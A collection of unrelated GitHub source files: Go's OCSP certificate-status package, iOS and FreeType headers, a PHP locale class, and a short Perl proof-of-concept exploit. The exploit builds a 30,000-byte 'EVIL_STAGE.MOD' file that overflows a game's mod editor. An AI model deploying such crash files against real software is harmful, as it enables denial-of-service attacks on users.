// are signed messages attesting to the validity of a certificate for a small
// period of time. This is used to manage revocation for X.509 certificates.
package ocsp // import "golang.org/x/crypto/ocsp"
import (
"crypto"
"crypto/ecdsa"
"crypto/elliptic"
"crypto/rand"
"crypto/rsa"
_ "crypto/sha1"
_ "crypto/sha256"
_ "crypto/sha512"
"crypto/x509"
"crypto/x509/pkix"
"encoding/asn1"
"errors"
"fmt"
"math/big"
"strconv"
"time"
)
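// Illustrative usage sketch (not part of the original source): a minimal
// client-side flow for this package. The HTTP transport, the responder URL
// taken from cert.OCSPServer, and the error handling shown here are
// assumptions for illustration only, not a definitive implementation.
//
//	opts := &ocsp.RequestOptions{Hash: crypto.SHA256}
//	der, err := ocsp.CreateRequest(cert, issuer, opts)
//	if err != nil {
//		log.Fatal(err)
//	}
//	httpResp, err := http.Post(cert.OCSPServer[0], "application/ocsp-request", bytes.NewReader(der))
//	if err != nil {
//		log.Fatal(err)
//	}
//	defer httpResp.Body.Close()
//	raw, err := ioutil.ReadAll(httpResp.Body)
//	if err != nil {
//		log.Fatal(err)
//	}
//	resp, err := ocsp.ParseResponseForCert(raw, cert, issuer)
//	if err != nil {
//		log.Fatal(err)
//	}
//	if resp.Status == ocsp.Revoked {
//		log.Printf("certificate %v revoked at %v", cert.SerialNumber, resp.RevokedAt)
//	}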
var idPKIXOCSPBasic = asn1.ObjectIdentifier([]int{1, 3, 6, 1, 5, 5, 7, 48, 1, 1})
// ResponseStatus contains the result of an OCSP request. See
// https://tools.ietf.org/html/rfc6960#section-2.3
type ResponseStatus int
const (
Success ResponseStatus = 0
Malformed ResponseStatus = 1
InternalError ResponseStatus = 2
TryLater ResponseStatus = 3
// Status code four is unused in OCSP. See
// https://tools.ietf.org/html/rfc6960#section-4.2.1
SignatureRequired ResponseStatus = 5
Unauthorized ResponseStatus = 6
)
func (r ResponseStatus) String() string {
switch r {
case Success:
return "success"
case Malformed:
return "malformed"
case InternalError:
return "internal error"
case TryLater:
return "try later"
case SignatureRequired:
return "signature required"
case Unauthorized:
return "unauthorized"
default:
return "unknown OCSP status: " + strconv.Itoa(int(r))
}
}
// ResponseError is an error that may be returned by ParseResponse to indicate
// that the response itself is an error, not just that its indicating that a
// certificate is revoked, unknown, etc.
type ResponseError struct {
Status ResponseStatus
}
func (r ResponseError) Error() string {
return "ocsp: error from server: " + r.Status.String()
}
// These are internal structures that reflect the ASN.1 structure of an OCSP
// response. See RFC 2560, section 4.2.
type certID struct {
HashAlgorithm pkix.AlgorithmIdentifier
NameHash []byte
IssuerKeyHash []byte
SerialNumber *big.Int
}
// https://tools.ietf.org/html/rfc2560#section-4.1.1
type ocspRequest struct {
TBSRequest tbsRequest
}
type tbsRequest struct {
Version int `asn1:"explicit,tag:0,default:0,optional"`
RequestorName pkix.RDNSequence `asn1:"explicit,tag:1,optional"`
RequestList []request
}
type request struct {
Cert certID
}
type responseASN1 struct {
Status asn1.Enumerated
Response responseBytes `asn1:"explicit,tag:0,optional"`
}
type responseBytes struct {
ResponseType asn1.ObjectIdentifier
Response []byte
}
type basicResponse struct {
TBSResponseData responseData
SignatureAlgorithm pkix.AlgorithmIdentifier
Signature asn1.BitString
Certificates []asn1.RawValue `asn1:"explicit,tag:0,optional"`
}
type responseData struct {
Raw asn1.RawContent
Version int `asn1:"optional,default:0,explicit,tag:0"`
RawResponderID asn1.RawValue
ProducedAt time.Time `asn1:"generalized"`
Responses []singleResponse
}
type singleResponse struct {
CertID certID
Good asn1.Flag `asn1:"tag:0,optional"`
Revoked revokedInfo `asn1:"tag:1,optional"`
Unknown asn1.Flag `asn1:"tag:2,optional"`
ThisUpdate time.Time `asn1:"generalized"`
NextUpdate time.Time `asn1:"generalized,explicit,tag:0,optional"`
SingleExtensions []pkix.Extension `asn1:"explicit,tag:1,optional"`
}
type revokedInfo struct {
RevocationTime time.Time `asn1:"generalized"`
Reason asn1.Enumerated `asn1:"explicit,tag:0,optional"`
}
var (
oidSignatureMD2WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 2}
oidSignatureMD5WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 4}
oidSignatureSHA1WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 5}
oidSignatureSHA256WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 11}
oidSignatureSHA384WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 12}
oidSignatureSHA512WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 13}
oidSignatureDSAWithSHA1 = asn1.ObjectIdentifier{1, 2, 840, 10040, 4, 3}
oidSignatureDSAWithSHA256 = asn1.ObjectIdentifier{2, 16, 840, 1, 101, 3, 4, 3, 2}
oidSignatureECDSAWithSHA1 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 1}
oidSignatureECDSAWithSHA256 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 3, 2}
oidSignatureECDSAWithSHA384 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 3, 3}
oidSignatureECDSAWithSHA512 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 3, 4}
)
var hashOIDs = map[crypto.Hash]asn1.ObjectIdentifier{
crypto.SHA1: asn1.ObjectIdentifier([]int{1, 3, 14, 3, 2, 26}),
crypto.SHA256: asn1.ObjectIdentifier([]int{2, 16, 840, 1, 101, 3, 4, 2, 1}),
crypto.SHA384: asn1.ObjectIdentifier([]int{2, 16, 840, 1, 101, 3, 4, 2, 2}),
crypto.SHA512: asn1.ObjectIdentifier([]int{2, 16, 840, 1, 101, 3, 4, 2, 3}),
}
// TODO(rlb): This is also from crypto/x509, so same comment as AGL's below
var signatureAlgorithmDetails = []struct {
algo x509.SignatureAlgorithm
oid asn1.ObjectIdentifier
pubKeyAlgo x509.PublicKeyAlgorithm
hash crypto.Hash
}{
{x509.MD2WithRSA, oidSignatureMD2WithRSA, x509.RSA, crypto.Hash(0) /* no value for MD2 */},
{x509.MD5WithRSA, oidSignatureMD5WithRSA, x509.RSA, crypto.MD5},
{x509.SHA1WithRSA, oidSignatureSHA1WithRSA, x509.RSA, crypto.SHA1},
{x509.SHA256WithRSA, oidSignatureSHA256WithRSA, x509.RSA, crypto.SHA256},
{x509.SHA384WithRSA, oidSignatureSHA384WithRSA, x509.RSA, crypto.SHA384},
{x509.SHA512WithRSA, oidSignatureSHA512WithRSA, x509.RSA, crypto.SHA512},
{x509.DSAWithSHA1, oidSignatureDSAWithSHA1, x509.DSA, crypto.SHA1},
{x509.DSAWithSHA256, oidSignatureDSAWithSHA256, x509.DSA, crypto.SHA256},
{x509.ECDSAWithSHA1, oidSignatureECDSAWithSHA1, x509.ECDSA, crypto.SHA1},
{x509.ECDSAWithSHA256, oidSignatureECDSAWithSHA256, x509.ECDSA, crypto.SHA256},
{x509.ECDSAWithSHA384, oidSignatureECDSAWithSHA384, x509.ECDSA, crypto.SHA384},
{x509.ECDSAWithSHA512, oidSignatureECDSAWithSHA512, x509.ECDSA, crypto.SHA512},
}
// TODO(rlb): This is also from crypto/x509, so same comment as AGL's below
func signingParamsForPublicKey(pub interface{}, requestedSigAlgo x509.SignatureAlgorithm) (hashFunc crypto.Hash, sigAlgo pkix.AlgorithmIdentifier, err error) {
var pubType x509.PublicKeyAlgorithm
switch pub := pub.(type) {
case *rsa.PublicKey:
pubType = x509.RSA
hashFunc = crypto.SHA256
sigAlgo.Algorithm = oidSignatureSHA256WithRSA
sigAlgo.Parameters = asn1.RawValue{
Tag: 5,
}
case *ecdsa.PublicKey:
pubType = x509.ECDSA
switch pub.Curve {
case elliptic.P224(), elliptic.P256():
hashFunc = crypto.SHA256
sigAlgo.Algorithm = oidSignatureECDSAWithSHA256
case elliptic.P384():
hashFunc = crypto.SHA384
sigAlgo.Algorithm = oidSignatureECDSAWithSHA384
case elliptic.P521():
hashFunc = crypto.SHA512
sigAlgo.Algorithm = oidSignatureECDSAWithSHA512
default:
err = errors.New("x509: unknown elliptic curve")
}
default:
err = errors.New("x509: only RSA and ECDSA keys supported")
}
if err != nil {
return
}
if requestedSigAlgo == 0 {
return
}
found := false
for _, details := range signatureAlgorithmDetails {
if details.algo == requestedSigAlgo {
if details.pubKeyAlgo != pubType {
err = errors.New("x509: requested SignatureAlgorithm does not match private key type")
return
}
sigAlgo.Algorithm, hashFunc = details.oid, details.hash
if hashFunc == 0 {
err = errors.New("x509: cannot sign with hash function requested")
return
}
found = true
break
}
}
if !found {
err = errors.New("x509: unknown SignatureAlgorithm")
}
return
}
// TODO(agl): this is taken from crypto/x509 and so should probably be exported
// from crypto/x509 or crypto/x509/pkix.
func getSignatureAlgorithmFromOID(oid asn1.ObjectIdentifier) x509.SignatureAlgorithm {
for _, details := range signatureAlgorithmDetails {
if oid.Equal(details.oid) {
return details.algo
}
}
return x509.UnknownSignatureAlgorithm
}
// TODO(rlb): This is not taken from crypto/x509, but it's of the same general form.
func getHashAlgorithmFromOID(target asn1.ObjectIdentifier) crypto.Hash {
for hash, oid := range hashOIDs {
if oid.Equal(target) {
return hash
}
}
return crypto.Hash(0)
}
func getOIDFromHashAlgorithm(target crypto.Hash) asn1.ObjectIdentifier {
for hash, oid := range hashOIDs {
if hash == target {
return oid
}
}
return nil
}
// This is the exposed reflection of the internal OCSP structures.
// The status values that can be expressed in OCSP. See RFC 6960.
const (
// Good means that the certificate is valid.
Good = iota
// Revoked means that the certificate has been deliberately revoked.
Revoked
// Unknown means that the OCSP responder doesn't know about the certificate.
Unknown
// ServerFailed is unused and was never used (see
// https://go-review.googlesource.com/#/c/18944). ParseResponse will
// return a ResponseError when an error response is parsed.
ServerFailed
)
// The enumerated reasons for revoking a certificate. See RFC 5280.
const (
Unspecified = 0
KeyCompromise = 1
CACompromise = 2
AffiliationChanged = 3
Superseded = 4
CessationOfOperation = 5
CertificateHold = 6
RemoveFromCRL = 8
PrivilegeWithdrawn = 9
AACompromise = 10
)
// Request represents an OCSP request. See RFC 6960.
type Request struct {
HashAlgorithm crypto.Hash
IssuerNameHash []byte
IssuerKeyHash []byte
SerialNumber *big.Int
}
// Marshal marshals the OCSP request to ASN.1 DER encoded form.
func (req *Request) Marshal() ([]byte, error) {
hashAlg := getOIDFromHashAlgorithm(req.HashAlgorithm)
if hashAlg == nil {
return nil, errors.New("Unknown hash algorithm")
}
return asn1.Marshal(ocspRequest{
tbsRequest{
Version: 0,
RequestList: []request{
{
Cert: certID{
pkix.AlgorithmIdentifier{
Algorithm: hashAlg,
Parameters: asn1.RawValue{Tag: 5 /* ASN.1 NULL */},
},
req.IssuerNameHash,
req.IssuerKeyHash,
req.SerialNumber,
},
},
},
},
})
}
// Response represents an OCSP response containing a single SingleResponse. See
// RFC 6960.
type Response struct {
// Status is one of {Good, Revoked, Unknown}
Status int
SerialNumber *big.Int
ProducedAt, ThisUpdate, NextUpdate, RevokedAt time.Time
RevocationReason int
Certificate *x509.Certificate
// TBSResponseData contains the raw bytes of the signed response. If
// Certificate is nil then this can be used to verify Signature.
TBSResponseData []byte
Signature []byte
SignatureAlgorithm x509.SignatureAlgorithm
// IssuerHash is the hash used to compute the IssuerNameHash and IssuerKeyHash.
// Valid values are crypto.SHA1, crypto.SHA256, crypto.SHA384, and crypto.SHA512.
// If zero, the default is crypto.SHA1.
IssuerHash crypto.Hash
// RawResponderName optionally contains the DER-encoded subject of the
// responder certificate. Exactly one of RawResponderName and
// ResponderKeyHash is set.
RawResponderName []byte
// ResponderKeyHash optionally contains the SHA-1 hash of the
// responder's public key. Exactly one of RawResponderName and
// ResponderKeyHash is set.
ResponderKeyHash []byte
// Extensions contains raw X.509 extensions from the singleExtensions field
// of the OCSP response. When parsing certificates, this can be used to
// extract non-critical extensions that are not parsed by this package. When
// marshaling OCSP responses, the Extensions field is ignored, see
// ExtraExtensions.
Extensions []pkix.Extension
// ExtraExtensions contains extensions to be copied, raw, into any marshaled
// OCSP response (in the singleExtensions field). Values override any
// extensions that would otherwise be produced based on the other fields. The
// ExtraExtensions field is not populated when parsing certificates, see
// Extensions.
ExtraExtensions []pkix.Extension
}
// These are pre-serialized error responses for the various non-success codes
// defined by OCSP. The Unauthorized code in particular can be used by an OCSP
// responder that supports only pre-signed responses as a response to requests
// for certificates with unknown status. See RFC 5019.
var (
MalformedRequestErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x01}
InternalErrorErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x02}
TryLaterErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x03}
SigRequredErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x05}
UnauthorizedErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x06}
)
// CheckSignatureFrom checks that the signature in resp is a valid signature
// from issuer. This should only be used if resp.Certificate is nil. Otherwise,
// the OCSP response contained an intermediate certificate that created the
// signature. That signature is checked by ParseResponse and only
// resp.Certificate remains to be validated.
func (resp *Response) CheckSignatureFrom(issuer *x509.Certificate) error {
return issuer.CheckSignature(resp.SignatureAlgorithm, resp.TBSResponseData, resp.Signature)
}
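// Illustrative sketch (not part of the original source): when a parsed
// response carries no embedded responder certificate, the caller verifies the
// signature against a certificate it already trusts. Variable names here are
// placeholders.
//
//	resp, err := ocsp.ParseResponse(der, nil)
//	if err == nil && resp.Certificate == nil {
//		err = resp.CheckSignatureFrom(issuer)
//	}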
// ParseError results from an invalid OCSP response.
type ParseError string
func (p ParseError) Error() string {
return string(p)
}
// ParseRequest parses an OCSP request in DER form. It only supports
// requests for a single certificate. Signed requests are not supported.
// If a request includes a signature, it will result in a ParseError.
func ParseRequest(bytes []byte) (*Request, error) {
var req ocspRequest
rest, err := asn1.Unmarshal(bytes, &req)
if err != nil {
return nil, err
}
if len(rest) > 0 {
return nil, ParseError("trailing data in OCSP request")
}
if len(req.TBSRequest.RequestList) == 0 {
return nil, ParseError("OCSP request contains no request body")
}
innerRequest := req.TBSRequest.RequestList[0]
hashFunc := getHashAlgorithmFromOID(innerRequest.Cert.HashAlgorithm.Algorithm)
if hashFunc == crypto.Hash(0) {
return nil, ParseError("OCSP request uses unknown hash function")
}
return &Request{
HashAlgorithm: hashFunc,
IssuerNameHash: innerRequest.Cert.NameHash,
IssuerKeyHash: innerRequest.Cert.IssuerKeyHash,
SerialNumber: innerRequest.Cert.SerialNumber,
}, nil
}
// ParseResponse parses an OCSP response in DER form. It only supports
// responses for a single certificate. If the response contains a certificate
// then the signature over the response is checked. If issuer is not nil then
// it will be used to validate the signature or embedded certificate.
//
// Invalid responses and parse failures will result in a ParseError.
// Error responses will result in a ResponseError.
func ParseResponse(bytes []byte, issuer *x509.Certificate) (*Response, error) {
return ParseResponseForCert(bytes, nil, issuer)
}
// ParseResponseForCert parses an OCSP response in DER form and searches for a
// Response relating to cert. If such a Response is found and the OCSP response
// contains a certificate then the signature over the response is checked. If
// issuer is not nil then it will be used to validate the signature or embedded
// certificate.
//
// Invalid responses and parse failures will result in a ParseError.
// Error responses will result in a ResponseError.
func ParseResponseForCert(bytes []byte, cert, issuer *x509.Certificate) (*Response, error) {
var resp responseASN1
rest, err := asn1.Unmarshal(bytes, &resp)
if err != nil {
return nil, err
}
if len(rest) > 0 {
return nil, ParseError("trailing data in OCSP response")
}
if status := ResponseStatus(resp.Status); status != Success {
return nil, ResponseError{status}
}
if !resp.Response.ResponseType.Equal(idPKIXOCSPBasic) {
return nil, ParseError("bad OCSP response type")
}
var basicResp basicResponse
rest, err = asn1.Unmarshal(resp.Response.Response, &basicResp)
if err != nil {
return nil, err
}
if n := len(basicResp.TBSResponseData.Responses); n == 0 || cert == nil && n > 1 {
return nil, ParseError("OCSP response contains bad number of responses")
}
var singleResp singleResponse
if cert == nil {
singleResp = basicResp.TBSResponseData.Responses[0]
} else {
match := false
for _, resp := range basicResp.TBSResponseData.Responses {
if cert.SerialNumber.Cmp(resp.CertID.SerialNumber) == 0 {
singleResp = resp
match = true
break
}
}
if !match {
return nil, ParseError("no response matching the supplied certificate")
}
}
ret := &Response{
TBSResponseData: basicResp.TBSResponseData.Raw,
Signature: basicResp.Signature.RightAlign(),
SignatureAlgorithm: getSignatureAlgorithmFromOID(basicResp.SignatureAlgorithm.Algorithm),
Extensions: singleResp.SingleExtensions,
SerialNumber: singleResp.CertID.SerialNumber,
ProducedAt: basicResp.TBSResponseData.ProducedAt,
ThisUpdate: singleResp.ThisUpdate,
NextUpdate: singleResp.NextUpdate,
}
// Handle the ResponderID CHOICE tag. ResponderID can be flattened into
// TBSResponseData once https://go-review.googlesource.com/34503 has been
// released.
rawResponderID := basicResp.TBSResponseData.RawResponderID
switch rawResponderID.Tag {
case 1: // Name
var rdn pkix.RDNSequence
if rest, err := asn1.Unmarshal(rawResponderID.Bytes, &rdn); err != nil || len(rest) != 0 {
return nil, ParseError("invalid responder name")
}
ret.RawResponderName = rawResponderID.Bytes
case 2: // KeyHash
if rest, err := asn1.Unmarshal(rawResponderID.Bytes, &ret.ResponderKeyHash); err != nil || len(rest) != 0 {
return nil, ParseError("invalid responder key hash")
}
default:
return nil, ParseError("invalid responder id tag")
}
if len(basicResp.Certificates) > 0 {
// Responders should only send a single certificate (if they
// send any) that connects the responder's certificate to the
// original issuer. We accept responses with multiple
		// certificates due to a number of responders sending them[1], but
// ignore all but the first.
//
// [1] https://github.com/golang/go/issues/21527
ret.Certificate, err = x509.ParseCertificate(basicResp.Certificates[0].FullBytes)
if err != nil {
return nil, err
}
if err := ret.CheckSignatureFrom(ret.Certificate); err != nil {
return nil, ParseError("bad signature on embedded certificate: " + err.Error())
}
if issuer != nil {
if err := issuer.CheckSignature(ret.Certificate.SignatureAlgorithm, ret.Certificate.RawTBSCertificate, ret.Certificate.Signature); err != nil {
return nil, ParseError("bad OCSP signature: " + err.Error())
}
}
} else if issuer != nil {
if err := ret.CheckSignatureFrom(issuer); err != nil {
return nil, ParseError("bad OCSP signature: " + err.Error())
}
}
for _, ext := range singleResp.SingleExtensions {
if ext.Critical {
return nil, ParseError("unsupported critical extension")
}
}
for h, oid := range hashOIDs {
if singleResp.CertID.HashAlgorithm.Algorithm.Equal(oid) {
ret.IssuerHash = h
break
}
}
if ret.IssuerHash == 0 {
return nil, ParseError("unsupported issuer hash algorithm")
}
switch {
case bool(singleResp.Good):
ret.Status = Good
case bool(singleResp.Unknown):
ret.Status = Unknown
default:
ret.Status = Revoked
ret.RevokedAt = singleResp.Revoked.RevocationTime
ret.RevocationReason = int(singleResp.Revoked.Reason)
}
return ret, nil
}
// RequestOptions contains options for constructing OCSP requests.
type RequestOptions struct {
// Hash contains the hash function that should be used when
// constructing the OCSP request. If zero, SHA-1 will be used.
Hash crypto.Hash
}
func (opts *RequestOptions) hash() crypto.Hash {
if opts == nil || opts.Hash == 0 {
// SHA-1 is nearly universally used in OCSP.
return crypto.SHA1
}
return opts.Hash
}
// CreateRequest returns a DER-encoded, OCSP request for the status of cert. If
// opts is nil then sensible defaults are used.
func CreateRequest(cert, issuer *x509.Certificate, opts *RequestOptions) ([]byte, error) {
hashFunc := opts.hash()
// OCSP seems to be the only place where these raw hash identifiers are
// used. I took the following from
// http://msdn.microsoft.com/en-us/library/ff635603.aspx
_, ok := hashOIDs[hashFunc]
if !ok {
return nil, x509.ErrUnsupportedAlgorithm
}
if !hashFunc.Available() {
return nil, x509.ErrUnsupportedAlgorithm
}
h := opts.hash().New()
var publicKeyInfo struct {
Algorithm pkix.AlgorithmIdentifier
PublicKey asn1.BitString
}
if _, err := asn1.Unmarshal(issuer.RawSubjectPublicKeyInfo, &publicKeyInfo); err != nil {
return nil, err
}
h.Write(publicKeyInfo.PublicKey.RightAlign())
issuerKeyHash := h.Sum(nil)
h.Reset()
h.Write(issuer.RawSubject)
issuerNameHash := h.Sum(nil)
req := &Request{
HashAlgorithm: hashFunc,
IssuerNameHash: issuerNameHash,
IssuerKeyHash: issuerKeyHash,
SerialNumber: cert.SerialNumber,
}
return req.Marshal()
}
// CreateResponse returns a DER-encoded OCSP response with the specified contents.
// The fields in the response are populated as follows:
//
// The responder cert is used to populate the responder's name field, and the
// certificate itself is provided alongside the OCSP response signature.
//
// The issuer cert is used to populate the IssuerNameHash and IssuerKeyHash fields.
//
// The template is used to populate the SerialNumber, Status, RevokedAt,
// RevocationReason, ThisUpdate, and NextUpdate fields.
//
// If template.IssuerHash is not set, SHA1 will be used.
//
// The ProducedAt date is automatically set to the current date, to the nearest minute.
func CreateResponse(issuer, responderCert *x509.Certificate, template Response, priv crypto.Signer) ([]byte, error) {
var publicKeyInfo struct {
Algorithm pkix.AlgorithmIdentifier
PublicKey asn1.BitString
}
if _, err := asn1.Unmarshal(issuer.RawSubjectPublicKeyInfo, &publicKeyInfo); err != nil {
return nil, err
}
if template.IssuerHash == 0 {
template.IssuerHash = crypto.SHA1
}
hashOID := getOIDFromHashAlgorithm(template.IssuerHash)
if hashOID == nil {
return nil, errors.New("unsupported issuer hash algorithm")
}
if !template.IssuerHash.Available() {
return nil, fmt.Errorf("issuer hash algorithm %v not linked into binary", template.IssuerHash)
}
h := template.IssuerHash.New()
h.Write(publicKeyInfo.PublicKey.RightAlign())
issuerKeyHash := h.Sum(nil)
h.Reset()
h.Write(issuer.RawSubject)
issuerNameHash := h.Sum(nil)
innerResponse := singleResponse{
CertID: certID{
HashAlgorithm: pkix.AlgorithmIdentifier{
Algorithm: hashOID,
Parameters: asn1.RawValue{Tag: 5 /* ASN.1 NULL */},
},
NameHash: issuerNameHash,
IssuerKeyHash: issuerKeyHash,
SerialNumber: template.SerialNumber,
},
ThisUpdate: template.ThisUpdate.UTC(),
NextUpdate: template.NextUpdate.UTC(),
SingleExtensions: template.ExtraExtensions,
}
switch template.Status {
case Good:
innerResponse.Good = true
case Unknown:
innerResponse.Unknown = true
case Revoked:
innerResponse.Revoked = revokedInfo{
RevocationTime: template.RevokedAt.UTC(),
Reason: asn1.Enumerated(template.RevocationReason),
}
}
rawResponderID := asn1.RawValue{
Class: 2, // context-specific
Tag: 1, // Name (explicit tag)
IsCompound: true,
Bytes: responderCert.RawSubject,
}
tbsResponseData := responseData{
Version: 0,
RawResponderID: rawResponderID,
ProducedAt: time.Now().Truncate(time.Minute).UTC(),
Responses: []singleResponse{innerResponse},
}
tbsResponseDataDER, err := asn1.Marshal(tbsResponseData)
if err != nil {
return nil, err
}
hashFunc, signatureAlgorithm, err := signingParamsForPublicKey(priv.Public(), template.SignatureAlgorithm)
if err != nil {
return nil, err
}
responseHash := hashFunc.New()
responseHash.Write(tbsResponseDataDER)
signature, err := priv.Sign(rand.Reader, responseHash.Sum(nil), hashFunc)
if err != nil {
return nil, err
}
response := basicResponse{
TBSResponseData: tbsResponseData,
SignatureAlgorithm: signatureAlgorithm,
Signature: asn1.BitString{
Bytes: signature,
BitLength: 8 * len(signature),
},
}
if template.Certificate != nil {
response.Certificates = []asn1.RawValue{
{FullBytes: template.Certificate.Raw},
}
}
responseDER, err := asn1.Marshal(response)
if err != nil {
return nil, err
}
return asn1.Marshal(responseASN1{
Status: asn1.Enumerated(Success),
Response: responseBytes{
ResponseType: idPKIXOCSPBasic,
Response: responseDER,
},
})
}
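// Illustrative responder-side sketch (not part of the original source): parse
// an incoming request, then answer it with CreateResponse. The responder
// certificate, signing key, and update intervals are placeholders chosen for
// illustration.
//
//	req, err := ocsp.ParseRequest(requestDER)
//	if err != nil {
//		log.Fatal(err)
//	}
//	template := ocsp.Response{
//		Status:       ocsp.Good,
//		SerialNumber: req.SerialNumber,
//		ThisUpdate:   time.Now(),
//		NextUpdate:   time.Now().Add(24 * time.Hour),
//	}
//	responseDER, err := ocsp.CreateResponse(issuer, responderCert, template, responderKey)
//	if err != nil {
//		log.Fatal(err)
//	}
//	// responseDER is ready to be served with Content-Type application/ocsp-response.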
| {
"pile_set_name": "Github"
} |
#!/usr/bin/perl
# Title : Hacker Evolution: untold Mod Editor buffer overflow
# Date : June 19, 2010
# Author : gunslinger_ <[email protected]>
# Web : http://devilzc0de.com
# Blog : http://gunslingerc0de.wordpress.com
# Software Link : http://www.exosyphen.com/page_hacker-evolution-untold.html
# Version : 2.00.001
# Tested on : Windows XP SP2
# Open Hacker Evolution Mod editor -> open file -> EVIL_STAGE.MOD
my $file= "EVIL_STAGE.MOD";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "MOD File Created successfully\n";
| {
"pile_set_name": "Github"
} |
//
// ______ ______ ______
// /\ __ \ /\ ___\ /\ ___\
// \ \ __< \ \ __\_ \ \ __\_
// \ \_____\ \ \_____\ \ \_____\
// \/_____/ \/_____/ \/_____/
//
// Copyright (c) 2013 BEE creators
// http://www.whatsbug.com
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation
// the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the
// Software is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
// IN THE SOFTWARE.
//
//
// Bee_UIMatrixView.h
//
#if (TARGET_OS_IPHONE || TARGET_IPHONE_SIMULATOR)
#import "Bee_Precompile.h"
#import "Bee_UISignal.h"
#pragma mark -
@class BeeUIMatrixView;
@protocol BeeUIMatrixViewDataSource
- (CGSize)sizeOfViewForMatrixView:(BeeUIMatrixView *)matrixView;
- (NSInteger)numberOfRowsInMatrixView:(BeeUIMatrixView *)matrixView;
- (NSInteger)numberOfColsInMatrixView:(BeeUIMatrixView *)matrixView;
- (UIView *)matrixView:(BeeUIMatrixView *)matrixView row:(NSInteger)row col:(NSInteger)col;
@end
@interface BeeUIMatrixView : UIScrollView<BeeUIMatrixViewDataSource, UIScrollViewDelegate>
{
id _dataSource;
NSInteger _rowTotal;
NSInteger _colTotal;
CGSize _itemSize;
NSRange _rowVisibleRange;
NSRange _colVisibleRange;
NSMutableArray * _items;
BOOL _shouldNotify;
BOOL _reachTop;
BOOL _reachBottom;
BOOL _reachLeft;
BOOL _reachRight;
BOOL _reloaded;
BOOL _reloading;
UIEdgeInsets _baseInsets;
NSMutableArray * _reuseQueue;
CGPoint _scrollSpeed;
CGPoint _lastOffset;
NSTimeInterval _lastOffsetCapture;
}
@property (nonatomic, assign) id dataSource;
@property (nonatomic, readonly) NSInteger rowTotal;
@property (nonatomic, readonly) NSInteger colTotal;
@property (nonatomic, readonly) NSRange rowVisibleRange;
@property (nonatomic, readonly) NSRange colVisibleRange;
@property (nonatomic, readonly) NSMutableArray * items;
@property (nonatomic, readonly) BOOL reachTop;
@property (nonatomic, readonly) BOOL reachBottom;
@property (nonatomic, readonly) BOOL reachLeft;
@property (nonatomic, readonly) BOOL reachRight;
@property (nonatomic, assign) BOOL reloaded;
@property (nonatomic, readonly) BOOL reloading;
@property (nonatomic, retain) NSMutableArray * reuseQueue;
@property (nonatomic, readonly) CGPoint scrollSpeed;
AS_SIGNAL( RELOADED )		// data was reloaded
AS_SIGNAL( REACH_TOP )		// reached the top
AS_SIGNAL( REACH_BOTTOM )	// reached the bottom
AS_SIGNAL( REACH_LEFT )		// reached the left edge
AS_SIGNAL( REACH_RIGHT )	// reached the right edge
AS_SIGNAL( DID_STOP )
AS_SIGNAL( DID_SCROLL )
+ (BeeUIMatrixView *)spawn;
+ (BeeUIMatrixView *)spawn:(NSString *)tagString;
- (id)dequeueWithContentClass:(Class)clazz;
- (void)setBaseInsets:(UIEdgeInsets)insets;
- (UIEdgeInsets)getBaseInsets;
- (void)reloadData;
- (void)syncReloadData;
- (void)asyncReloadData;
- (void)cancelReloadData;
@end
#endif // #if (TARGET_OS_IPHONE || TARGET_IPHONE_SIMULATOR)
| {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* tterrors.h */
/* */
/* TrueType error codes (specification only). */
/* */
/* Copyright 2001, 2012 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
/*************************************************************************/
/* */
/* This file is used to define the TrueType error enumeration */
/* constants. */
/* */
/*************************************************************************/
#ifndef __TTERRORS_H__
#define __TTERRORS_H__
#include FT_MODULE_ERRORS_H
#undef __FTERRORS_H__
#undef FT_ERR_PREFIX
#define FT_ERR_PREFIX TT_Err_
#define FT_ERR_BASE FT_Mod_Err_TrueType
#include FT_ERRORS_H
#endif /* __TTERRORS_H__ */
/* END */
| {
"pile_set_name": "Github"
} |
<?php
namespace Fisharebest\Localization\Locale;
/**
* Class LocaleYueHans - Yue
*
* @author Greg Roach <[email protected]>
* @copyright (c) 2019 Greg Roach
* @license GPLv3+
*/
class LocaleYueHans extends LocaleYue
{
public function endonym()
{
return '粤语';
}
}
| {
"pile_set_name": "Github"
} |
/***********************************************************************
* *
* This software is part of the ast package *
* Copyright (c) 2000-2011 AT&T Intellectual Property *
* and is licensed under the *
